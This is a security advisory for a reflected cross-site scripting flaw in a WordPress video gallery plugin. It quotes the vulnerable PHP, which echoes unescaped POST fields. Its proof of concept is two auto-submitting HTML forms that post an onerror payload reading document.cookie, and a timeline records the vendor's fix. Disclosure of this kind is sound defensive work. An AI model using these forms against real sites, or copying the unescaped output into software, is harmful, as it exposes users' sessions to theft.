$_POST['thumbtext'] and $_POST['linkbutton'] are not escaped inside huge_it_video_gallery_ajax().
Also content type is not set to json.
File: gallery-images\gallery-images.php
$output .='
<li class="huge_it_big_li">
'.$likeCont.'<input type="hidden" class="pagenum" value="'.$page.'" />
'.$video.'
<div class="overLayer"></div>
<div class="infoLayer">
<ul>
<li>
<h2>
'.$video_name.'
</h2>
</li>
<li>
<p>
'.$_POST['thumbtext'].'
</p>
</li>
</ul>
</div>
</li>
';
$button='<div class="button-block"><a href="'.$row->sl_url.'" '.$target.' >'.$_POST['linkbutton'].'</a></div>';Proof of Concept
Create page with payload.
After user open url, payload will be send to browser.
<form name="xss" action="http://wp/wp-admin/admin-ajax.php?action=huge_it_video_gallery_ajax" method="post">
<input type="hidden" name="task" value="load_image_thumbnail">
<input type="hidden" name="page" value="1">
<input type="hidden" name="perpage" value="1">
<input type="hidden" name="galleryid" value="1">
<input type="hidden" name="thumbtext" value='<img src=x onerror=alert(document.cookie)>'>
<input type="submit" value="Send">
</form>
<script>document.xss.submit();</script><form name="xss" action="http://wp/wp-admin/admin-ajax.php?action=huge_it_video_gallery_ajax" method="post">
<input type="hidden" name="task" value="load_images_content">
<input type="hidden" name="page" value="1">
<input type="hidden" name="perpage" value="1">
<input type="hidden" name="galleryid" value="1">
<input type="hidden" name="linkbutton" value='<img src=x onerror=alert(document.cookie)>'>
<input type="submit" value="Send">
</form>
<script>document.xss.submit();</script>Timeline
- 02-12-2015: Discovered
- 02-12-2015: Vendor notified
- 03-12-2015: Version 1.7.1 released, issue resolved
